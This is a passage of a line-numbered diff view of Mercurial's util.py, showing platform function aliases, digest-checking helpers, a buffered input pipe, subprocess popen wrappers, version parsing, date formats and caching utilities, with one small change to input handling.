108 gethgcmd = platform.gethgcmd
108 gethgcmd = platform.gethgcmd
109 getuser = platform.getuser
109 getuser = platform.getuser
110 getpid = os.getpid
110 getpid = os.getpid
111 groupmembers = platform.groupmembers
111 groupmembers = platform.groupmembers
112 groupname = platform.groupname
112 groupname = platform.groupname
113 hidewindow = platform.hidewindow
113 hidewindow = platform.hidewindow
114 isexec = platform.isexec
114 isexec = platform.isexec
115 isowner = platform.isowner
115 isowner = platform.isowner
116 listdir = osutil.listdir
116 listdir = osutil.listdir
117 localpath = platform.localpath
117 localpath = platform.localpath
118 lookupreg = platform.lookupreg
118 lookupreg = platform.lookupreg
119 makedir = platform.makedir
119 makedir = platform.makedir
120 nlinks = platform.nlinks
120 nlinks = platform.nlinks
121 normpath = platform.normpath
121 normpath = platform.normpath
122 normcase = platform.normcase
122 normcase = platform.normcase
123 normcasespec = platform.normcasespec
123 normcasespec = platform.normcasespec
124 normcasefallback = platform.normcasefallback
124 normcasefallback = platform.normcasefallback
125 openhardlinks = platform.openhardlinks
125 openhardlinks = platform.openhardlinks
126 oslink = platform.oslink
126 oslink = platform.oslink
127 parsepatchoutput = platform.parsepatchoutput
127 parsepatchoutput = platform.parsepatchoutput
128 pconvert = platform.pconvert
128 pconvert = platform.pconvert
129 poll = platform.poll
129 poll = platform.poll
130 popen = platform.popen
130 popen = platform.popen
131 posixfile = platform.posixfile
131 posixfile = platform.posixfile
132 quotecommand = platform.quotecommand
132 quotecommand = platform.quotecommand
133 readpipe = platform.readpipe
133 readpipe = platform.readpipe
134 rename = platform.rename
134 rename = platform.rename
135 removedirs = platform.removedirs
135 removedirs = platform.removedirs
136 samedevice = platform.samedevice
136 samedevice = platform.samedevice
137 samefile = platform.samefile
137 samefile = platform.samefile
138 samestat = platform.samestat
138 samestat = platform.samestat
139 setbinary = platform.setbinary
139 setbinary = platform.setbinary
140 setflags = platform.setflags
140 setflags = platform.setflags
141 setsignalhandler = platform.setsignalhandler
141 setsignalhandler = platform.setsignalhandler
142 shellquote = platform.shellquote
142 shellquote = platform.shellquote
143 spawndetached = platform.spawndetached
143 spawndetached = platform.spawndetached
144 split = platform.split
144 split = platform.split
145 sshargs = platform.sshargs
145 sshargs = platform.sshargs
146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 statisexec = platform.statisexec
147 statisexec = platform.statisexec
148 statislink = platform.statislink
148 statislink = platform.statislink
149 testpid = platform.testpid
149 testpid = platform.testpid
150 umask = platform.umask
150 umask = platform.umask
151 unlink = platform.unlink
151 unlink = platform.unlink
152 username = platform.username
152 username = platform.username
153
153
154 try:
154 try:
155 recvfds = osutil.recvfds
155 recvfds = osutil.recvfds
156 except AttributeError:
156 except AttributeError:
157 pass
157 pass
158 try:
158 try:
159 setprocname = osutil.setprocname
159 setprocname = osutil.setprocname
160 except AttributeError:
160 except AttributeError:
161 pass
161 pass
162
162
163 # Python compatibility
163 # Python compatibility
164
164
165 _notset = object()
165 _notset = object()
166
166
167 # disable Python's problematic floating point timestamps (issue4836)
167 # disable Python's problematic floating point timestamps (issue4836)
168 # (Python hypocritically says you shouldn't change this behavior in
168 # (Python hypocritically says you shouldn't change this behavior in
169 # libraries, and sure enough Mercurial is not a library.)
169 # libraries, and sure enough Mercurial is not a library.)
170 os.stat_float_times(False)
170 os.stat_float_times(False)
171
171
172 def safehasattr(thing, attr):
172 def safehasattr(thing, attr):
173 return getattr(thing, attr, _notset) is not _notset
173 return getattr(thing, attr, _notset) is not _notset
174
174
175 def bytesinput(fin, fout, *args, **kwargs):
175 def bytesinput(fin, fout, *args, **kwargs):
176 sin, sout = sys.stdin, sys.stdout
176 sin, sout = sys.stdin, sys.stdout
177 try:
177 try:
178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
179 if pycompat.ispy3:
179 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
180 return encoding.strtolocal(input(*args, **kwargs))
181 else:
182 return raw_input(*args, **kwargs)
183 finally:
180 finally:
184 sys.stdin, sys.stdout = sin, sout
181 sys.stdin, sys.stdout = sin, sout
185
182
186 def bitsfrom(container):
183 def bitsfrom(container):
187 bits = 0
184 bits = 0
188 for bit in container:
185 for bit in container:
189 bits |= bit
186 bits |= bit
190 return bits
187 return bits
191
188
192 # python 2.6 still have deprecation warning enabled by default. We do not want
189 # python 2.6 still have deprecation warning enabled by default. We do not want
193 # to display anything to standard user so detect if we are running test and
190 # to display anything to standard user so detect if we are running test and
194 # only use python deprecation warning in this case.
191 # only use python deprecation warning in this case.
195 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
192 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
196 if _dowarn:
193 if _dowarn:
197 # explicitly unfilter our warning for python 2.7
194 # explicitly unfilter our warning for python 2.7
198 #
195 #
199 # The option of setting PYTHONWARNINGS in the test runner was investigated.
196 # The option of setting PYTHONWARNINGS in the test runner was investigated.
200 # However, module name set through PYTHONWARNINGS was exactly matched, so
197 # However, module name set through PYTHONWARNINGS was exactly matched, so
201 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
198 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
202 # makes the whole PYTHONWARNINGS thing useless for our usecase.
199 # makes the whole PYTHONWARNINGS thing useless for our usecase.
203 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
200 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
206
203
207 def nouideprecwarn(msg, version, stacklevel=1):
204 def nouideprecwarn(msg, version, stacklevel=1):
208 """Issue an python native deprecation warning
205 """Issue an python native deprecation warning
209
206
210 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
207 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
211 """
208 """
212 if _dowarn:
209 if _dowarn:
213 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
210 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
214 " update your code.)") % version
211 " update your code.)") % version
215 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
212 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
216
213
217 DIGESTS = {
214 DIGESTS = {
218 'md5': hashlib.md5,
215 'md5': hashlib.md5,
219 'sha1': hashlib.sha1,
216 'sha1': hashlib.sha1,
220 'sha512': hashlib.sha512,
217 'sha512': hashlib.sha512,
221 }
218 }
222 # List of digest types from strongest to weakest
219 # List of digest types from strongest to weakest
223 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
220 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
224
221
225 for k in DIGESTS_BY_STRENGTH:
222 for k in DIGESTS_BY_STRENGTH:
226 assert k in DIGESTS
223 assert k in DIGESTS
227
224
228 class digester(object):
225 class digester(object):
229 """helper to compute digests.
226 """helper to compute digests.
230
227
231 This helper can be used to compute one or more digests given their name.
228 This helper can be used to compute one or more digests given their name.
232
229
233 >>> d = digester(['md5', 'sha1'])
230 >>> d = digester(['md5', 'sha1'])
234 >>> d.update('foo')
231 >>> d.update('foo')
235 >>> [k for k in sorted(d)]
232 >>> [k for k in sorted(d)]
236 ['md5', 'sha1']
233 ['md5', 'sha1']
237 >>> d['md5']
234 >>> d['md5']
238 'acbd18db4cc2f85cedef654fccc4a4d8'
235 'acbd18db4cc2f85cedef654fccc4a4d8'
239 >>> d['sha1']
236 >>> d['sha1']
240 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
237 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
241 >>> digester.preferred(['md5', 'sha1'])
238 >>> digester.preferred(['md5', 'sha1'])
242 'sha1'
239 'sha1'
243 """
240 """
244
241
245 def __init__(self, digests, s=''):
242 def __init__(self, digests, s=''):
246 self._hashes = {}
243 self._hashes = {}
247 for k in digests:
244 for k in digests:
248 if k not in DIGESTS:
245 if k not in DIGESTS:
249 raise Abort(_('unknown digest type: %s') % k)
246 raise Abort(_('unknown digest type: %s') % k)
250 self._hashes[k] = DIGESTS[k]()
247 self._hashes[k] = DIGESTS[k]()
251 if s:
248 if s:
252 self.update(s)
249 self.update(s)
253
250
254 def update(self, data):
251 def update(self, data):
255 for h in self._hashes.values():
252 for h in self._hashes.values():
256 h.update(data)
253 h.update(data)
257
254
258 def __getitem__(self, key):
255 def __getitem__(self, key):
259 if key not in DIGESTS:
256 if key not in DIGESTS:
260 raise Abort(_('unknown digest type: %s') % k)
257 raise Abort(_('unknown digest type: %s') % k)
261 return self._hashes[key].hexdigest()
258 return self._hashes[key].hexdigest()
262
259
263 def __iter__(self):
260 def __iter__(self):
264 return iter(self._hashes)
261 return iter(self._hashes)
265
262
266 @staticmethod
263 @staticmethod
267 def preferred(supported):
264 def preferred(supported):
268 """returns the strongest digest type in both supported and DIGESTS."""
265 """returns the strongest digest type in both supported and DIGESTS."""
269
266
270 for k in DIGESTS_BY_STRENGTH:
267 for k in DIGESTS_BY_STRENGTH:
271 if k in supported:
268 if k in supported:
272 return k
269 return k
273 return None
270 return None
274
271
275 class digestchecker(object):
272 class digestchecker(object):
276 """file handle wrapper that additionally checks content against a given
273 """file handle wrapper that additionally checks content against a given
277 size and digests.
274 size and digests.
278
275
279 d = digestchecker(fh, size, {'md5': '...'})
276 d = digestchecker(fh, size, {'md5': '...'})
280
277
281 When multiple digests are given, all of them are validated.
278 When multiple digests are given, all of them are validated.
282 """
279 """
283
280
284 def __init__(self, fh, size, digests):
281 def __init__(self, fh, size, digests):
285 self._fh = fh
282 self._fh = fh
286 self._size = size
283 self._size = size
287 self._got = 0
284 self._got = 0
288 self._digests = dict(digests)
285 self._digests = dict(digests)
289 self._digester = digester(self._digests.keys())
286 self._digester = digester(self._digests.keys())
290
287
291 def read(self, length=-1):
288 def read(self, length=-1):
292 content = self._fh.read(length)
289 content = self._fh.read(length)
293 self._digester.update(content)
290 self._digester.update(content)
294 self._got += len(content)
291 self._got += len(content)
295 return content
292 return content
296
293
297 def validate(self):
294 def validate(self):
298 if self._size != self._got:
295 if self._size != self._got:
299 raise Abort(_('size mismatch: expected %d, got %d') %
296 raise Abort(_('size mismatch: expected %d, got %d') %
300 (self._size, self._got))
297 (self._size, self._got))
301 for k, v in self._digests.items():
298 for k, v in self._digests.items():
302 if v != self._digester[k]:
299 if v != self._digester[k]:
303 # i18n: first parameter is a digest name
300 # i18n: first parameter is a digest name
304 raise Abort(_('%s mismatch: expected %s, got %s') %
301 raise Abort(_('%s mismatch: expected %s, got %s') %
305 (k, v, self._digester[k]))
302 (k, v, self._digester[k]))
306
303
307 try:
304 try:
308 buffer = buffer
305 buffer = buffer
309 except NameError:
306 except NameError:
310 def buffer(sliceable, offset=0, length=None):
307 def buffer(sliceable, offset=0, length=None):
311 if length is not None:
308 if length is not None:
312 return memoryview(sliceable)[offset:offset + length]
309 return memoryview(sliceable)[offset:offset + length]
313 return memoryview(sliceable)[offset:]
310 return memoryview(sliceable)[offset:]
314
311
315 closefds = pycompat.osname == 'posix'
312 closefds = pycompat.osname == 'posix'
316
313
317 _chunksize = 4096
314 _chunksize = 4096
318
315
319 class bufferedinputpipe(object):
316 class bufferedinputpipe(object):
320 """a manually buffered input pipe
317 """a manually buffered input pipe
321
318
322 Python will not let us use buffered IO and lazy reading with 'polling' at
319 Python will not let us use buffered IO and lazy reading with 'polling' at
323 the same time. We cannot probe the buffer state and select will not detect
320 the same time. We cannot probe the buffer state and select will not detect
324 that data are ready to read if they are already buffered.
321 that data are ready to read if they are already buffered.
325
322
326 This class let us work around that by implementing its own buffering
323 This class let us work around that by implementing its own buffering
327 (allowing efficient readline) while offering a way to know if the buffer is
324 (allowing efficient readline) while offering a way to know if the buffer is
328 empty from the output (allowing collaboration of the buffer with polling).
325 empty from the output (allowing collaboration of the buffer with polling).
329
326
330 This class lives in the 'util' module because it makes use of the 'os'
327 This class lives in the 'util' module because it makes use of the 'os'
331 module from the python stdlib.
328 module from the python stdlib.
332 """
329 """
333
330
334 def __init__(self, input):
331 def __init__(self, input):
335 self._input = input
332 self._input = input
336 self._buffer = []
333 self._buffer = []
337 self._eof = False
334 self._eof = False
338 self._lenbuf = 0
335 self._lenbuf = 0
339
336
340 @property
337 @property
341 def hasbuffer(self):
338 def hasbuffer(self):
342 """True is any data is currently buffered
339 """True is any data is currently buffered
343
340
344 This will be used externally a pre-step for polling IO. If there is
341 This will be used externally a pre-step for polling IO. If there is
345 already data then no polling should be set in place."""
342 already data then no polling should be set in place."""
346 return bool(self._buffer)
343 return bool(self._buffer)
347
344
348 @property
345 @property
349 def closed(self):
346 def closed(self):
350 return self._input.closed
347 return self._input.closed
351
348
352 def fileno(self):
349 def fileno(self):
353 return self._input.fileno()
350 return self._input.fileno()
354
351
355 def close(self):
352 def close(self):
356 return self._input.close()
353 return self._input.close()
357
354
358 def read(self, size):
355 def read(self, size):
359 while (not self._eof) and (self._lenbuf < size):
356 while (not self._eof) and (self._lenbuf < size):
360 self._fillbuffer()
357 self._fillbuffer()
361 return self._frombuffer(size)
358 return self._frombuffer(size)
362
359
363 def readline(self, *args, **kwargs):
360 def readline(self, *args, **kwargs):
364 if 1 < len(self._buffer):
361 if 1 < len(self._buffer):
365 # this should not happen because both read and readline end with a
362 # this should not happen because both read and readline end with a
366 # _frombuffer call that collapse it.
363 # _frombuffer call that collapse it.
367 self._buffer = [''.join(self._buffer)]
364 self._buffer = [''.join(self._buffer)]
368 self._lenbuf = len(self._buffer[0])
365 self._lenbuf = len(self._buffer[0])
369 lfi = -1
366 lfi = -1
370 if self._buffer:
367 if self._buffer:
371 lfi = self._buffer[-1].find('\n')
368 lfi = self._buffer[-1].find('\n')
372 while (not self._eof) and lfi < 0:
369 while (not self._eof) and lfi < 0:
373 self._fillbuffer()
370 self._fillbuffer()
374 if self._buffer:
371 if self._buffer:
375 lfi = self._buffer[-1].find('\n')
372 lfi = self._buffer[-1].find('\n')
376 size = lfi + 1
373 size = lfi + 1
377 if lfi < 0: # end of file
374 if lfi < 0: # end of file
378 size = self._lenbuf
375 size = self._lenbuf
379 elif 1 < len(self._buffer):
376 elif 1 < len(self._buffer):
380 # we need to take previous chunks into account
377 # we need to take previous chunks into account
381 size += self._lenbuf - len(self._buffer[-1])
378 size += self._lenbuf - len(self._buffer[-1])
382 return self._frombuffer(size)
379 return self._frombuffer(size)
383
380
384 def _frombuffer(self, size):
381 def _frombuffer(self, size):
385 """return at most 'size' data from the buffer
382 """return at most 'size' data from the buffer
386
383
387 The data are removed from the buffer."""
384 The data are removed from the buffer."""
388 if size == 0 or not self._buffer:
385 if size == 0 or not self._buffer:
389 return ''
386 return ''
390 buf = self._buffer[0]
387 buf = self._buffer[0]
391 if 1 < len(self._buffer):
388 if 1 < len(self._buffer):
392 buf = ''.join(self._buffer)
389 buf = ''.join(self._buffer)
393
390
394 data = buf[:size]
391 data = buf[:size]
395 buf = buf[len(data):]
392 buf = buf[len(data):]
396 if buf:
393 if buf:
397 self._buffer = [buf]
394 self._buffer = [buf]
398 self._lenbuf = len(buf)
395 self._lenbuf = len(buf)
399 else:
396 else:
400 self._buffer = []
397 self._buffer = []
401 self._lenbuf = 0
398 self._lenbuf = 0
402 return data
399 return data
403
400
404 def _fillbuffer(self):
401 def _fillbuffer(self):
405 """read data to the buffer"""
402 """read data to the buffer"""
406 data = os.read(self._input.fileno(), _chunksize)
403 data = os.read(self._input.fileno(), _chunksize)
407 if not data:
404 if not data:
408 self._eof = True
405 self._eof = True
409 else:
406 else:
410 self._lenbuf += len(data)
407 self._lenbuf += len(data)
411 self._buffer.append(data)
408 self._buffer.append(data)
412
409
413 def popen2(cmd, env=None, newlines=False):
410 def popen2(cmd, env=None, newlines=False):
414 # Setting bufsize to -1 lets the system decide the buffer size.
411 # Setting bufsize to -1 lets the system decide the buffer size.
415 # The default for bufsize is 0, meaning unbuffered. This leads to
412 # The default for bufsize is 0, meaning unbuffered. This leads to
416 # poor performance on Mac OS X: http://bugs.python.org/issue4194
413 # poor performance on Mac OS X: http://bugs.python.org/issue4194
417 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
414 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
418 close_fds=closefds,
415 close_fds=closefds,
419 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
416 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
420 universal_newlines=newlines,
417 universal_newlines=newlines,
421 env=env)
418 env=env)
422 return p.stdin, p.stdout
419 return p.stdin, p.stdout
423
420
424 def popen3(cmd, env=None, newlines=False):
421 def popen3(cmd, env=None, newlines=False):
425 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
422 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
426 return stdin, stdout, stderr
423 return stdin, stdout, stderr
427
424
428 def popen4(cmd, env=None, newlines=False, bufsize=-1):
425 def popen4(cmd, env=None, newlines=False, bufsize=-1):
429 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
426 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
430 close_fds=closefds,
427 close_fds=closefds,
431 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
432 stderr=subprocess.PIPE,
429 stderr=subprocess.PIPE,
433 universal_newlines=newlines,
430 universal_newlines=newlines,
434 env=env)
431 env=env)
435 return p.stdin, p.stdout, p.stderr, p
432 return p.stdin, p.stdout, p.stderr, p
436
433
437 def version():
434 def version():
438 """Return version information if available."""
435 """Return version information if available."""
439 try:
436 try:
440 from . import __version__
437 from . import __version__
441 return __version__.version
438 return __version__.version
442 except ImportError:
439 except ImportError:
443 return 'unknown'
440 return 'unknown'
444
441
445 def versiontuple(v=None, n=4):
442 def versiontuple(v=None, n=4):
446 """Parses a Mercurial version string into an N-tuple.
443 """Parses a Mercurial version string into an N-tuple.
447
444
448 The version string to be parsed is specified with the ``v`` argument.
445 The version string to be parsed is specified with the ``v`` argument.
449 If it isn't defined, the current Mercurial version string will be parsed.
446 If it isn't defined, the current Mercurial version string will be parsed.
450
447
451 ``n`` can be 2, 3, or 4. Here is how some version strings map to
448 ``n`` can be 2, 3, or 4. Here is how some version strings map to
452 returned values:
449 returned values:
453
450
454 >>> v = '3.6.1+190-df9b73d2d444'
451 >>> v = '3.6.1+190-df9b73d2d444'
455 >>> versiontuple(v, 2)
452 >>> versiontuple(v, 2)
456 (3, 6)
453 (3, 6)
457 >>> versiontuple(v, 3)
454 >>> versiontuple(v, 3)
458 (3, 6, 1)
455 (3, 6, 1)
459 >>> versiontuple(v, 4)
456 >>> versiontuple(v, 4)
460 (3, 6, 1, '190-df9b73d2d444')
457 (3, 6, 1, '190-df9b73d2d444')
461
458
462 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
459 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
463 (3, 6, 1, '190-df9b73d2d444+20151118')
460 (3, 6, 1, '190-df9b73d2d444+20151118')
464
461
465 >>> v = '3.6'
462 >>> v = '3.6'
466 >>> versiontuple(v, 2)
463 >>> versiontuple(v, 2)
467 (3, 6)
464 (3, 6)
468 >>> versiontuple(v, 3)
465 >>> versiontuple(v, 3)
469 (3, 6, None)
466 (3, 6, None)
470 >>> versiontuple(v, 4)
467 >>> versiontuple(v, 4)
471 (3, 6, None, None)
468 (3, 6, None, None)
472
469
473 >>> v = '3.9-rc'
470 >>> v = '3.9-rc'
474 >>> versiontuple(v, 2)
471 >>> versiontuple(v, 2)
475 (3, 9)
472 (3, 9)
476 >>> versiontuple(v, 3)
473 >>> versiontuple(v, 3)
477 (3, 9, None)
474 (3, 9, None)
478 >>> versiontuple(v, 4)
475 >>> versiontuple(v, 4)
479 (3, 9, None, 'rc')
476 (3, 9, None, 'rc')
480
477
481 >>> v = '3.9-rc+2-02a8fea4289b'
478 >>> v = '3.9-rc+2-02a8fea4289b'
482 >>> versiontuple(v, 2)
479 >>> versiontuple(v, 2)
483 (3, 9)
480 (3, 9)
484 >>> versiontuple(v, 3)
481 >>> versiontuple(v, 3)
485 (3, 9, None)
482 (3, 9, None)
486 >>> versiontuple(v, 4)
483 >>> versiontuple(v, 4)
487 (3, 9, None, 'rc+2-02a8fea4289b')
484 (3, 9, None, 'rc+2-02a8fea4289b')
488 """
485 """
489 if not v:
486 if not v:
490 v = version()
487 v = version()
491 parts = remod.split('[\+-]', v, 1)
488 parts = remod.split('[\+-]', v, 1)
492 if len(parts) == 1:
489 if len(parts) == 1:
493 vparts, extra = parts[0], None
490 vparts, extra = parts[0], None
494 else:
491 else:
495 vparts, extra = parts
492 vparts, extra = parts
496
493
497 vints = []
494 vints = []
498 for i in vparts.split('.'):
495 for i in vparts.split('.'):
499 try:
496 try:
500 vints.append(int(i))
497 vints.append(int(i))
501 except ValueError:
498 except ValueError:
502 break
499 break
503 # (3, 6) -> (3, 6, None)
500 # (3, 6) -> (3, 6, None)
504 while len(vints) < 3:
501 while len(vints) < 3:
505 vints.append(None)
502 vints.append(None)
506
503
507 if n == 2:
504 if n == 2:
508 return (vints[0], vints[1])
505 return (vints[0], vints[1])
509 if n == 3:
506 if n == 3:
510 return (vints[0], vints[1], vints[2])
507 return (vints[0], vints[1], vints[2])
511 if n == 4:
508 if n == 4:
512 return (vints[0], vints[1], vints[2], extra)
509 return (vints[0], vints[1], vints[2], extra)
513
510
514 # used by parsedate
511 # used by parsedate
515 defaultdateformats = (
512 defaultdateformats = (
516 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
513 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
517 '%Y-%m-%dT%H:%M', # without seconds
514 '%Y-%m-%dT%H:%M', # without seconds
518 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
515 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
519 '%Y-%m-%dT%H%M', # without seconds
516 '%Y-%m-%dT%H%M', # without seconds
520 '%Y-%m-%d %H:%M:%S', # our common legal variant
517 '%Y-%m-%d %H:%M:%S', # our common legal variant
521 '%Y-%m-%d %H:%M', # without seconds
518 '%Y-%m-%d %H:%M', # without seconds
522 '%Y-%m-%d %H%M%S', # without :
519 '%Y-%m-%d %H%M%S', # without :
523 '%Y-%m-%d %H%M', # without seconds
520 '%Y-%m-%d %H%M', # without seconds
524 '%Y-%m-%d %I:%M:%S%p',
521 '%Y-%m-%d %I:%M:%S%p',
525 '%Y-%m-%d %H:%M',
522 '%Y-%m-%d %H:%M',
526 '%Y-%m-%d %I:%M%p',
523 '%Y-%m-%d %I:%M%p',
527 '%Y-%m-%d',
524 '%Y-%m-%d',
528 '%m-%d',
525 '%m-%d',
529 '%m/%d',
526 '%m/%d',
530 '%m/%d/%y',
527 '%m/%d/%y',
531 '%m/%d/%Y',
528 '%m/%d/%Y',
532 '%a %b %d %H:%M:%S %Y',
529 '%a %b %d %H:%M:%S %Y',
533 '%a %b %d %I:%M:%S%p %Y',
530 '%a %b %d %I:%M:%S%p %Y',
534 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
531 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
535 '%b %d %H:%M:%S %Y',
532 '%b %d %H:%M:%S %Y',
536 '%b %d %I:%M:%S%p %Y',
533 '%b %d %I:%M:%S%p %Y',
537 '%b %d %H:%M:%S',
534 '%b %d %H:%M:%S',
538 '%b %d %I:%M:%S%p',
535 '%b %d %I:%M:%S%p',
539 '%b %d %H:%M',
536 '%b %d %H:%M',
540 '%b %d %I:%M%p',
537 '%b %d %I:%M%p',
541 '%b %d %Y',
538 '%b %d %Y',
542 '%b %d',
539 '%b %d',
543 '%H:%M:%S',
540 '%H:%M:%S',
544 '%I:%M:%S%p',
541 '%I:%M:%S%p',
545 '%H:%M',
542 '%H:%M',
546 '%I:%M%p',
543 '%I:%M%p',
547 )
544 )
548
545
549 extendeddateformats = defaultdateformats + (
546 extendeddateformats = defaultdateformats + (
550 "%Y",
547 "%Y",
551 "%Y-%m",
548 "%Y-%m",
552 "%b",
549 "%b",
553 "%b %Y",
550 "%b %Y",
554 )
551 )
555
552
556 def cachefunc(func):
553 def cachefunc(func):
557 '''cache the result of function calls'''
554 '''cache the result of function calls'''
558 # XXX doesn't handle keywords args
555 # XXX doesn't handle keywords args
559 if func.__code__.co_argcount == 0:
556 if func.__code__.co_argcount == 0:
560 cache = []
557 cache = []
561 def f():
558 def f():
562 if len(cache) == 0:
559 if len(cache) == 0:
563 cache.append(func())
560 cache.append(func())
564 return cache[0]
561 return cache[0]
565 return f
562 return f
566 cache = {}
563 cache = {}
567 if func.__code__.co_argcount == 1:
564 if func.__code__.co_argcount == 1:
568 # we gain a small amount of time because
565 # we gain a small amount of time because
569 # we don't need to pack/unpack the list
566 # we don't need to pack/unpack the list
570 def f(arg):
567 def f(arg):
571 if arg not in cache:
568 if arg not in cache:
572 cache[arg] = func(arg)
569 cache[arg] = func(arg)
573 return cache[arg]
570 return cache[arg]
574 else:
571 else:
575 def f(*args):
572 def f(*args):
576 if args not in cache:
573 if args not in cache:
577 cache[args] = func(*args)
574 cache[args] = func(*args)
578 return cache[args]
575 return cache[args]
579
576
580 return f
577 return f
581
578
582 class sortdict(collections.OrderedDict):
579 class sortdict(collections.OrderedDict):
583 '''a simple sorted dictionary
580 '''a simple sorted dictionary
584
581
585 >>> d1 = sortdict([('a', 0), ('b', 1)])
582 >>> d1 = sortdict([('a', 0), ('b', 1)])
586 >>> d2 = d1.copy()
583 >>> d2 = d1.copy()
587 >>> d2
584 >>> d2
588 sortdict([('a', 0), ('b', 1)])
585 sortdict([('a', 0), ('b', 1)])
589 >>> d2.update([('a', 2)])
586 >>> d2.update([('a', 2)])
590 >>> d2.keys() # should still be in last-set order
587 >>> d2.keys() # should still be in last-set order
591 ['b', 'a']
588 ['b', 'a']
592 '''
589 '''
593
590
594 def __setitem__(self, key, value):
591 def __setitem__(self, key, value):
595 if key in self:
592 if key in self:
596 del self[key]
593 del self[key]
597 super(sortdict, self).__setitem__(key, value)
594 super(sortdict, self).__setitem__(key, value)
598
595
599 if pycompat.ispypy:
596 if pycompat.ispypy:
600 # __setitem__() isn't called as of PyPy 5.8.0
597 # __setitem__() isn't called as of PyPy 5.8.0
601 def update(self, src):
598 def update(self, src):
602 if isinstance(src, dict):
599 if isinstance(src, dict):
603 src = src.iteritems()
600 src = src.iteritems()
604 for k, v in src:
601 for k, v in src:
605 self[k] = v
602 self[k] = v
606
603
607 class transactional(object):
604 class transactional(object):
608 """Base class for making a transactional type into a context manager."""
605 """Base class for making a transactional type into a context manager."""
609 __metaclass__ = abc.ABCMeta
606 __metaclass__ = abc.ABCMeta
610
607
611 @abc.abstractmethod
608 @abc.abstractmethod
612 def close(self):
609 def close(self):
613 """Successfully closes the transaction."""
610 """Successfully closes the transaction."""
614
611
615 @abc.abstractmethod
612 @abc.abstractmethod
616 def release(self):
613 def release(self):
617 """Marks the end of the transaction.
614 """Marks the end of the transaction.
618
615
619 If the transaction has not been closed, it will be aborted.
616 If the transaction has not been closed, it will be aborted.
620 """
617 """
621
618
622 def __enter__(self):
619 def __enter__(self):
623 return self
620 return self
624
621
625 def __exit__(self, exc_type, exc_val, exc_tb):
622 def __exit__(self, exc_type, exc_val, exc_tb):
626 try:
623 try:
627 if exc_type is None:
624 if exc_type is None:
628 self.close()
625 self.close()
629 finally:
626 finally:
630 self.release()
627 self.release()
631
628
632 @contextlib.contextmanager
629 @contextlib.contextmanager
633 def acceptintervention(tr=None):
630 def acceptintervention(tr=None):
634 """A context manager that closes the transaction on InterventionRequired
631 """A context manager that closes the transaction on InterventionRequired
635
632
636 If no transaction was provided, this simply runs the body and returns
633 If no transaction was provided, this simply runs the body and returns
637 """
634 """
638 if not tr:
635 if not tr:
639 yield
636 yield
640 return
637 return
641 try:
638 try:
642 yield
639 yield
643 tr.close()
640 tr.close()
644 except error.InterventionRequired:
641 except error.InterventionRequired:
645 tr.close()
642 tr.close()
646 raise
643 raise
647 finally:
644 finally:
648 tr.release()
645 tr.release()
649
646
650 @contextlib.contextmanager
647 @contextlib.contextmanager
651 def nullcontextmanager():
648 def nullcontextmanager():
652 yield
649 yield
653
650
654 class _lrucachenode(object):
651 class _lrucachenode(object):
655 """A node in a doubly linked list.
652 """A node in a doubly linked list.
656
653
657 Holds a reference to nodes on either side as well as a key-value
654 Holds a reference to nodes on either side as well as a key-value
658 pair for the dictionary entry.
655 pair for the dictionary entry.
659 """
656 """
660 __slots__ = (u'next', u'prev', u'key', u'value')
657 __slots__ = (u'next', u'prev', u'key', u'value')
661
658
662 def __init__(self):
659 def __init__(self):
663 self.next = None
660 self.next = None
664 self.prev = None
661 self.prev = None
665
662
666 self.key = _notset
663 self.key = _notset
667 self.value = None
664 self.value = None
668
665
669 def markempty(self):
666 def markempty(self):
670 """Mark the node as emptied."""
667 """Mark the node as emptied."""
671 self.key = _notset
668 self.key = _notset
672
669
673 class lrucachedict(object):
670 class lrucachedict(object):
674 """Dict that caches most recent accesses and sets.
671 """Dict that caches most recent accesses and sets.
675
672
676 The dict consists of an actual backing dict - indexed by original
673 The dict consists of an actual backing dict - indexed by original
677 key - and a doubly linked circular list defining the order of entries in
674 key - and a doubly linked circular list defining the order of entries in
678 the cache.
675 the cache.
679
676
680 The head node is the newest entry in the cache. If the cache is full,
